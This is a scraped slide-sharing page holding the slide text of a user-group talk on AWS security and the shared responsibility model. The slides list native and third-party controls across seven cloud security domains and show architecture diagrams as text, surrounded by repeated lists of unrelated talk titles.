Optimizing NoSQL Performance Through Observability
ScyllaDB
 
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
CzechDreamin
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Jeffrey Haguewood
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
Bhaskar Mitra
 

Recently uploaded (20)

SOQL 201 for Admins & Developers: Slice & Dice Your Org’s Data With Aggregate...
SOQL 201 for Admins & Developers: Slice & Dice Your Org’s Data With Aggregate...SOQL 201 for Admins & Developers: Slice & Dice Your Org’s Data With Aggregate...
SOQL 201 for Admins & Developers: Slice & Dice Your Org’s Data With Aggregate...
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
Optimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through ObservabilityOptimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through Observability
 
AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří Karpíšek
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
Powerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaPowerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara Laskowska
 
"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 

AWS Security 101: Understanding the Shared Security Model - Jeff Westphal, Milwaukee

  • 1. Jeff Westphal - Milwaukee and Madison AWS uGroup Leader AWS Security 101: Understanding the Shared Security Model
  • 3. PROD-VPC Public Subnet Instances IGW Private Subnet Instances DEV-VPC Public Subnet Instances IGW Private Subnet Instances Security Group RDS USEast S3 Buckets Fundamental Concepts in AWS Network • VPC • Public/Private Subnets • Security Groups • NACLs • Availability Zones Identity and Access • IAM • Users/Groups • Permissions • MFA Data and Compute • EC2 • EBS • S3 • CloudTrail • CloudWatch ELB USEast-1A
  • 4. Route 53Al Gore Shield DDOS Protection WAF
  • 6. VPC-A Public Subnet Instances IGW Private Subnet Instances VPC-B Public Subnet Instances IGW Private Subnet Instances IAM Account A Services VPC Private Subnet Instances Availability Zone Security Group RDS Private Subnet Security Group Elastic IP AutoscalingVPC NAT Gateway ELB VPC Peer VPC Peer AWS Region A VPC-B Public Subnet Instances IGW Private Subnet Instances AWS Region B VPC-B Public Subnet Instances IGW Private Subnet Instances AWS Region C IAM Account B VPC Peer VPN Gateway S3 Buckets
  • 7. VPC-A Public Subnet Instances IGW Private Subnet Instances VPC-B Public Subnet Instances IGW Private Subnet Instances IAM Account A Services VPC Private Subnet Instances Availability Zone Security Group RDS Private Subnet Security Group Elastic IP AutoscalingVPC NAT Gateway ELB VPC Peer VPC Peer AWS Region A VPC-B Public Subnet Instances IGW Private Subnet Instances AWS Region B VPC-B Public Subnet Instances IGW Private Subnet Instances AWS Region C IAM Account B VPC Peer VPN Gateway S3 Buckets
  • 9. AWS and you share responsibility for security AWS Foundation Services Compute Storage Database Networking AWS Global Infrastructure Regions Availability Zones Edge Locations Identity & Access Control Network Security Customer applications, Operating Systems & content You get to define your controls ON the Cloud AWS takes care of the security OF the Cloud You Inventory & Config Data Encryption
  • 10. Copyright 2018 Trend Micro Inc.10 Why do I need additional security in the cloud? Threats: • Network attack • Vulnerabilities • Malware • Insider threats Compliance: • PCI DSS • HIPAA • NIST • Internal
  • 11. Route 53Al Gore Shield Security at Scale WAF
  • 12. Copyright 2018 Trend Micro Inc.12 The 7 Security Domains of the Cloud Security Model 1. Network 2. Identity & Access Mgmt 3. Data 4. Visibility 5. Governance Rick & Compliance 6. Threat & Vulnerability Protection 7. Application Security
  • 13. Copyright 2018 Trend Micro Inc.13 Security Domain 1 – Network Security Native Services • VPC • NACLs, Security Groups • VPN, Direct Connect • VPC Peering • Public/Private Subnets • ELB/ALB Third-Party Services: • Next-Gen Firewall • CASB • Software Defined Perimeter
  • 14. Copyright 2018 Trend Micro Inc.14 Security Domain 2 – Identity and Access Management Native Services • IAM • MFA • SAML • STS • Directory Services • AWS Organizations Third-Party Services: • LDAP • SAML • SSO
  • 15. Copyright 2018 Trend Micro Inc.15 Security Domain 3 – Data Native Services • Encryption- KMS • Cloud HSM • Macie • Guard Duty Third-Party Services: • DLP • Integrity Monitoring • Log Inspection
  • 16. Copyright 2018 Trend Micro Inc.16 Security Domain 4 – Visibility Native Services • CloudTrail • CloudWatch • SNS • Trusted Advisor Third-Party Services: • SIEM • Log Intelligence • Perimeter Assessments
  • 17. Copyright 2018 Trend Micro Inc.17 Security Domain 5 – Governance & Compliance Native Services • CloudTrail • CloudWatch • Config • AWS Quick Starts Third-Party Services: • Best-Practice Checks • Charge Monitoring • Customized Alerts
  • 18. Copyright 2018 Trend Micro Inc.18 Security Domain 6 – Threat and Incident Detection and Response Native Services • VPC • Security Groups, NACLs • WAF • Shield • Inspector Third-Party Services: • Intrusion Prevention • Deep Packet Inspection • Malware, Antivirus • Zero Day/Hour Protection • Case Management
  • 19. Copyright 2018 Trend Micro Inc.19 Security Domain 7 – Application Security Native Services • Inspector • WAF • API Gateway • Cognito Third-Party Services: • CVE Checks • Host-Based Security Controls • Application Control • Vulnerability Scanning
  • 21. CloudFront DynamoDB SNS Mobile Notifications ALB ECR Kinesis Streams Lambda Functions ElastiCache Cluster Lambda Functions Game Updates Mobile Users S3 Bucket Static Content Internet Gateway CodeCommit ECR CodeBuild Lambda Functions Developer Serverless and Event Driven Architectures
  • 22. CloudFront DynamoDB SNS Mobile Notifications ALB ECR Kinesis Streams Lambda Functions ElastiCache Cluster Lambda Functions Game Updates Mobile Users S3 Bucket Static Content Internet Gateway CodeCommit ECR CodeBuild Lambda Functions Developer Serverless and Event Driven Architectures
  • 23. Copyright 2017 Trend Micro Inc.23 Integrated Protection through the entire Application Lifecycle BuildCommit Scan Alert DeployPush Sign/Promote Examine • Malware • Vulnerabilities • Custom IOCs APIs Signed
  • 24. Copyright 2018 Trend Micro Inc.24 7 Security Domains OSI Model • Physical • Data Link • Network • Transport • Session • Presentation • Application Cloud Security Model • Network • Identity & Access Mgmt • Data • Visibility • Governance Rick/Compliance • Threat, Vulnerability Protection • Application Security Please Do Not Throw Sausage Pizza Away ? ? ? ? ? ? ? @mkeaws
  • 25. Thank you!!! Hope to see everyone at Happy Hour!